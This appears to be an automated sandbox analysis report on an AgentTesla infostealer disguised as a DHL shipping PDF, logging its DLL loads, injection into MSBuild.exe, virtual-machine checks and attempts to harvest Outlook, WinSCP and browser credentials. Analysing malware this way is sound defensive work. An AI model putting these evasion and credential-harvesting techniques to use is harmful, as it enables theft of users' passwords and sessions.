                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: DHL Shipping Documents 0016229753_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: DHL Shipping Documents 0016229753_PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: DHL Shipping Documents 0016229753_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: `.Pdb/> source: MSBuild.exe, 00000003.00000002.2591555257.0000000000F11000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\cashout\Desktop\Outputs\Meazod.pdb source: DHL Shipping Documents 0016229753_PDF.exe
                    Source: Binary string: `.Pdb/ source: MSBuild.exe, 00000003.00000002.2591555257.0000000000F11000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: DHL Shipping Documents 0016229753_PDF.exe, Network.cs.Net Code: GetComponentsUndirected System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeCode function: 1_2_00007FF886E310FA pushad ; ret 1_2_00007FF886E31233
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeCode function: 1_2_00007FF886E31210 pushad ; ret 1_2_00007FF886E31233
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeMemory allocated: 1820000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeMemory allocated: 1B280000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1350000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4CE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe TID: 2580Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWZ
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1417803122.000000001C240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: DHL Shipping Documents 0016229753_PDF.exe, 00000001.00000002.1415854239.00000000015AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW B$
                    Source: MSBuild.exe, 00000003.00000002.2594562989.0000000005FCA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlleExt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: CC2008Jump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exeQueries volume information: C:\Users\user\Desktop\DHL Shipping Documents 0016229753_PDF.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.328f708.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.3293538.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.32b7d70.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.DHL Shipping Documents 0016229753_PDF.exe.13323f68.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2592099804.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1416664051.0000000003281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2591102452.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2592099804.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1416790317.00000000132E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DHL Shipping Documents 0016229753_PDF.exe PID: 5836, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5764, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
